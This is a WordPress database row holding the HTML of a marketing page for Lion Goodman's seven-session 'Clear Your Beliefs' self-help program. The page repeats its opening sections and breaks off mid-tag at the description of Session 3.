(2057, 2, '2014-12-14 21:32:38', '2014-12-15 02:32:38', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain’s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a 